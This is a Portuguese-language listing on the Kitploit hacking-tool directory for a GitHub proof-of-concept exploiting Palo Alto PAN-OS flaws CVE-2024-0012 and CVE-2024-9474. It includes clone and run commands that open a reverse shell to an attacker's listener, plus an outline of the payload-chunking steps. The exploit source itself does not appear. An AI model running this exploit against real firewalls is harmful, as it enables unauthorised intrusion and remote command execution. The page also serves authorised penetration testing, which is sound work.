Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

Este PoC tem como alvo vulnerabilidades no Palo Alto PAN-OS, especificamente CVE-2024-0012 e CVE-2024-9474. Este script automatiza o processo de exploração, incluindo criação de payload, entrega em blocos (chunked) e execução de comandos sem interrupções.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
852há 1 anoAinda não revisado
Compartilhar

🚀 Exploit CVE-2024-0012 e CVE-2024-9474 (Palo Alto PAN-OS) 🔐

Palo Alto PAN-OS Exploit Type

🛡️ Descrição

Este script de Prova de Conceito (PoC) visa vulnerabilidades no Palo Alto PAN-OS, especificamente CVE-2024-0012 e CVE-2024-9474, automatizando o processo de exploração, incluindo bypass de autenticação, criação de payload, entrega em partes (chunked) e execução perfeita de comandos.

⚠️ Este script é apenas para fins educacionais e de teste de penetração autorizado. O uso não autorizado é ilegal.


🔍 Vulnerabilidades Abordadas

CVE-2024-0012

  • Tipo: Bypass de Autenticação
  • Impacto: Permite acesso não autorizado às interfaces administrativas.
  • Gravidade: 🚨 Crítica

CVE-2024-9474

  • Tipo: Execução de Comandos e Escalação de Privilégios
  • Impacto: Permite que atacantes remotos executem comandos arbitrários.
  • Gravidade: 🔥 Média

🧑‍💻 Uso

🛠️ Clonar o Repositório

git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 Executar o Script

python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Argumentos:

  • <TARGET_URL>: A URL alvo, incluindo http ou https.
  • <LISTENER_IP>: Seu endereço IP para o listener do reverse shell.
  • <LISTENER_PORT>: A porta para o listener do reverse shell.

💡 Exemplo

python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 Demonstração do Exploit

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ Como Funciona

Obtenha a análise completa e os detalhes técnicos deste PoC neste artigo no Medium!

  1. 🔍 Verifica a vulnerabilidade: Garante que o alvo está vulnerável a CVE-2024-0012 e CVE-2024-9474.
  2. 🛡️ Extrai o PHPSESSID: Obtém um ID de sessão para exploração posterior.
  3. ✨ Gera o Payload: Cria um payload de reverse shell duplamente codificado.
  4. 📦 Envia Chunks: Envia partes (chunks) do payload para o servidor alvo.
  5. 🔗 Combina o Payload: Reconstrói o payload no sistema alvo.
  6. ⚡ Executa o Comando: Decodifica e executa o reverse shell.

⚠️ Aviso Legal

Este PoC destina-se apenas a fins educacionais e testes de segurança autorizados. O uso não autorizado desta ferramenta é estritamente proibido. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.


🧑‍🎓 Autor

ghostxploiter

Baixar ferramenta